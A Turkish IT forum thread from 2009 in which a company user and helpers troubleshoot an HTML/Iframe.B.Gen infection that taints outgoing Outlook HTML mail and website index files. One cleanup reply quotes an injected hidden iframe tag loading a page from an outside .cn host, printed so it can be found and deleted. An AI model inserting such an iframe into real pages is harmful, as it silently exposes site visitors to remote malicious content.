Forum

HTML/Iframe.B.Gen V...
 
Bildirimler
Hepsini Temizle

HTML/Iframe.B.Gen Virüs_Nasıl yok edilir.

25 Yazılar
3 Üyeler
0 Reactions
2,225 Görüntüleme
(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

HTML/Iframe.B.Gen Virüs nasıl yok edebilirim. Çıldıracağım... Daha düne kadar başka bir virüs ile uğraşırken birde bu çıktı başıma.


Norman_Malware_Cleaner programını öneriyor herkes daha denedim. Programı buldum, şu aralar indiriyorum. Bunun bir faydasını görebilecekmiyim, yada bir başka yolu yokmudur bu şer.... virüsün. Özellikle ben Mail attığım zaman karşı tarafa düşen mailde bu virüs ismi yazıyormuş ve attığım hiç bir eki, yazıyı okuyamaz duruma geliyormuş.


Saygılarımla.


 

 
Gönderildi : 29/08/2009 14:22

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

Merhaba,

Hocam iframe'lerbir siteye bulaşınca, tüm index dosyalarını haşat
ediyor ve siteyiziyaret eden kullanıcının bilgisayarına da bulaşır.
Yani yüksekihtimalle senin bilgisayarında da vardır. Ayrıca sitene
bağlandığın ftpprogramında şifren ve kullanıcı adın kayıtlıysa,
programı kapattığındabile bulaşma işlemi devam eder. Temizlemek için şu
adımlarıizleyebilirsin:

0)Notepad++ programını indir. (Yüklemek için: http://downloads.sourceforge.net ... 5.4.5.Installer.exe)

1)Bilgisayarına
sağlam bir virüs programı ve malware cleaner yükleyiptarama yap. Nod32
ve Norman Malware Cleaner iyi gider. Ücretsiz virüsprogramı kullanmak
istiyorsan, sadece tek bir programla tarama yapmakyerine, iki üç
programla tarama yapmanı tavsiye ederim. Hepsini tek tekyükleyip,
tarama yapıp kaldırman şartıyla tabii ki (: Virüs programı veNorman
Malware Cleaner(mükemmel bir temizleme aracı)'ı yüklediysen, virüs programından güncellemeni yapıp internet bağlantını kes.
NOT:NORMAN İÇİN İNDİRME ADRESİ:[ http://normanasa.vo.llnwd.net/o2 ... Malware_Cleaner.exe]

2)Bilgisayarıntemizlendikten
sonra, Ftp programına girip önbelleğindeki kayıtlışifreni falan
temizle. (kestiğin bağlantıyı yamalamayı unutma tabi Islık)

3)Sitenin yönetim paneline gir. (genelde http://www.siteadi.com/cpanel şeklindedir)
Burada ftp şifreni bayağı karışık bir şeye çevir ve içindemutlaka
sembol olsun birkaç tane. Aynı zamanda büyük küçük harfeduyarlı olması
daha garantili olur.

4)Dosya adında index kelimesi geçen tümdosyaları
bilgisayarına indir.  Bu dosyaların iframe bulaşmadan öncekibir tarihte
alınmış yedekleri varsa, direkt olarak değiştiripkurtulabilirsin
virüsten. Eğer yoksa:
indirdiğiniz tüm dosyalarıNotepad++
programıyla açıp CTRL+F kombinasyonunu kullanarak bu tarzifadeleri
bulup, Bul/Değiştir/Dosyada bul sekmelerinden "Değiştir"iseçerek açılan
pencerede de "Tümünü Değiştir (Belge)" butonuna basarak,boşluk
karakteriyle değiştirin aşağıdaki ifadeleri...
"

iframe src="http://www.k38n.cn/xl.htm" width="100" height="0" frameborder="0">"

İllabunlar
olacak değil ama genelde dosyaların atında yazar. Herhangibirini
kopyalayıp o iframe'yi aratın dosyalarda ve " "
(boşluk/space)karakteriyle değiştirin hepsini.

5)Son olarak iframesiz index dosyalarını atın tekrardan ftp'ye...

 

Bu linkede göz atabilirsin..

Kolay Gelsin,

 

 
Gönderildi : 29/08/2009 17:18

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Teşekkürler eren bey, fakat bu virüsü yada trojeni kökünden kazayacak bir yol, yöntem, öneri, remover yazılımı yokmudur. Çok acil lazım...

 
Gönderildi : 30/08/2009 13:02

(@ugurdemir)
Gönderiler: 9886
Illustrious Member
 

http://www.cozumpark.com/forums/thread/98575.aspx


Kolay gelsin.

 
Gönderildi : 30/08/2009 13:24

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 


http://www.cozumpark.com/forums/thread/98575.aspx


Kolay gelsin.



Ugur Bey tesekkurler.Konuyu okudum fakat benim şirkjetimde ve sistemimde FTP kurulu değil Napt bile FTP portu bil açık değil.


Konuda yazan (ntos.exe)/ yi aratacağım Spywave Doctor var elimde birde onunla taratacağım sonucu yazarım. Fakat Symantec olmasına rağmen sistemim de bu trojeni yada virüsü bulamıyor. Özellikle Outlook/tan Sayfa düzeninden HTML olarak ve yazı yazılan bölümün DEFTER şeklinde yapıb karşıya gönderdiğim zaman, karşı tarafta İframe.B.Gen virüs uyarısı veriyor.


Ayrıca şirketime Web Server'da yok. Şirketin Web sayfası Taşeron bir şirket tarafından üstlenilmiş.


Deneyip döneceğim. Başka bir yolu var isede lütfen öneride bulunun. Cumartesi Sabah 09,30'dan bu saate kadar bu zararlı ile uğraşıyorum eve bile gitmedim daha.


Saygılar...


 

 
Gönderildi : 30/08/2009 15:37

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Spyware Doctor yukledim banamısın demedi. Symantec, KasperSky, McAfee çözüm olmuyor. Diğer PC'lerde varmı kontrol edemedim şu an ETA Server'ın ve Kendi PC'min içinde var. Server'a bile bakmadım henüz. Size bir resim gönderiyorum Outlook resmi.


 


 

 
Gönderildi : 30/08/2009 17:15

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Aşağıda yer alan resimdede Outlook'tan yeni bir mail dedikten sonra açılan sayfaya Kaynağı görüntüle diyoruz ve en altta iframe gözüküyor.


Bunu nasıl sileceğim bilmiyorum. Şu an için 'Pareto Logic' firmasının Anti-Virus PLUS internetten kuruyorum. Her yolu deniyorum fakat çözüme ulaşamıyorum. Yardımlarınızı bekliyorum. Ayrıca bu virüs, trojen herneyse 1 ay önce çıkmış webden edindiğim bilgiye göre.



 

 
Gönderildi : 30/08/2009 18:21

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

İnternette birçok kişi çözümü Nod32 nin 4. sürümünü kullandıktan sonra halledebildiğini belirtiyor.Sen Nod32 nin bu sürümünü denemiş miydin.

 
Gönderildi : 30/08/2009 18:30

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

İnternette birçok kişi çözümü Nod32 nin 4. sürümünü kullandıktan sonra halledebildiğini belirtiyor.Sen Nod32 nin bu sürümünü denemiş miydin.


Hayır denemedim. Nod32 4 almadım Symantec kullandığım için. Muhakkak bunu mu yüklemek gerekiyor.


Smart Security 4 mü yoksa Antivirüs 4 mü



 


 

 
Gönderildi : 30/08/2009 18:41

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

Nod32 Antivirüs 4 olarak belirtmişler.Son baktığım bir yabancı forumdada avast önerilmiş.Kurtulmak için denemen gerekli.Herhangi bir virüs programının resmi sitesinde konu ile ilgili bir açıklama yok.

 
Gönderildi : 30/08/2009 18:47

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Peki ben bir şey sormak istiyorum. Nod32 konusunda.


Server 2000 ve 7 kullanıcıya hitaben söylüyorum. Nod32 server için olanı hangisi. Server'a yükleyip aynı symantec gibi clientlarada symantecin küçük bir setup'ı var onları yüklüyorsunuz. Server belirli aralıklarla açık clientları tarıyor, loglar oluşturuyor. Peki Nod32 için hangi versiyonu almak gerekir, Symantec'i devre dışı bırakacağım artık, yeter.


Saygılarımla.


 

 
Gönderildi : 30/08/2009 19:31

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

Linke bakabilirsin.

 
Gönderildi : 30/08/2009 19:38

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Teşekkür ederim Eren ;


Tabii bana versiyon 4 gerek ve 10 kullanıcılı lazam. Yinede ilgi ve alakana çok teşekkür ederim. Şu an için sorunu ÇÖZEMİYORUM. Yarına kaldı. Eset'in genel merkezine telefon açıp acil olarak sipariş vereceğim.


Teşekkürler... Ama halen uğraşıyorum nasıl çözerim diye. Yeni fikirlere halen açığım, ve devamlı bu konuyu takip ediyorum.


Saygılarımla.


 

 
Gönderildi : 30/08/2009 20:00

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Bir yol buldum fakat tam anlamıyla temizleniyormu bilmiyorum. Şöyle ki ;


npp.5.4.5.Installer  ( Notepad++ ) programını buldum ve kurdum. Ve ara'dan '' Dosyadaki sözcük yada deyim'' ' i seçerek  (((( Chura )))) kelimesini aratarak, bu iframe kodunun gömülü olduğu Internet Explorer, Metin dosyalarını karşıma getirdi. Bu dosyaları 20-25 tane seçerek grup şekilde Notepad++ programına atıp Düzenden Değiştiri seçerek TÜMÜNÜ Değiştir ve boş bırak olarak ayarladım ve tümünü temizledim. Şimdi birine mail attığımda Virüs olarak görmüyor, yada diğer antivirüs programlarıyla tarattığımda. Spywave ile de tarattım bulamadı bir şey


BU BİR ÇÖZÜMMÜDÜR.. !!!! Emin değilim. Sadece dosya içeriklerini kodları sildim. Bu şekilde kendimi kandırmış olabilirim yada trojeni !!!!.


Pazartesi olduğu zaman Nod32--4 alıp birde onu kuracağım. Umarım çözer dönerim size. Çözmesemde dönerim.


HALEN YENİ FİKİRLERE VE ÖNERİLERE AÇIĞIM.  Halen emin değilim temizlediğime çünkü.


Saygılarımla. Hayırlı iftarlar... Yine işyerinde iftar ettik, dünde işyerinde etmiştim iftarı. Umarım eve giderim.


 

 
Gönderildi : 30/08/2009 21:05

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

Bu yalnızca geçici bir çözümdür.Çözümün devamlılığını sağlayabilmen için bütün clientlarında ve serverlerinde virüs programı şart.

Kaç client ve server var?

 

 
Gönderildi : 30/08/2009 21:14

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 


Bu yalnızca geçici bir çözümdür.Çözümün devamlılığını sağlayabilmen için bütün clientlarında ve serverlerinde virüs programı şart.


Kaç client ve server var?



1 Server  10 Client = Symantec Antivirüs ve güncel... Fakat Symantecden her han vazgeçebilirim. Bazı konularda pasif ve yetersiz kalıyor.


Eset'ten fiyat teklifi alayım ondan sonra karar vereceğim. Ayrıca Spyware Doctor'u satan Perakende Mağaza varmıdır İstanbulda Lisanslı.


Muhakkak alacağım ondan soruyorum.

 
Gönderildi : 30/08/2009 23:11

(@ErenSARISALTIK)
Gönderiler: 890
Noble Member
 

Serverda bulunan Symantecin sürümü nedir?Son zamanlarda çıkan birçok virüse karşı odukça etkili aslında Symantec.(güncel sürümünün yüklenmesi halinde)

Eset direkt teklif vereceğini sanmıyorum.Çünkü genellikle bayilerine yönlendiriyorlar.Bu konular Portalın sponsorları var,onları arayarak Çözümpark'tan arıyorum dersen yardımcı olacaklardır.

 

 
Gönderildi : 30/08/2009 23:32

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 


 


GECE SAAT 01:12 VE ben bir yerden bir şekilde ESET NOD32 Antivirüs Verisyon 4 buldum ve tarattım. İŞTE SONUÇ... Yukarıda. Şimdi bu virüsten kurtulmuş mu oluyorum kesin olarak. ??????


Sayglarımla.


 

 
Gönderildi : 31/08/2009 04:11

(@MertSert)
Gönderiler: 474
Prominent Member
Konu başlatıcı
 

Tekrar Merhaba ;


Nod32 v.4  yazılımı ile ağdaki Client'larıda taramak istiyorum. Ağdan C partion'nunu paylaşıma açmak lazım tabii. Fakat öyle vrs ve trjn'ler varki, paylaşımı açık ağda bile diğer pc'lere atlama olanağı var. Bunun için ne yapmak gerek. Devamlı yapmak adına değil, bugüne mahsus bir şey bu. Yarın yada öbür gün. Nod32 4 alacağım. 1 Server + 15 Client olanından. Şimdi burdada size diğer bir sorum olacak.


Sistemimde


Symantec Antivürüs var. Versiyonu evet çok eski, sadece update ediyoruz. Symantec yerine Nod32 vers.-4  dahamı iyidir. Yoksa Symantec'den vazgeçme mi diyorsunuz. Yok sa Nod32,,, Symantec'den daha iyidirmi diyorsunuz.


Sayglarımla.

 
Gönderildi : 31/08/2009 14:32

Sayfa 1 / 2
Paylaş: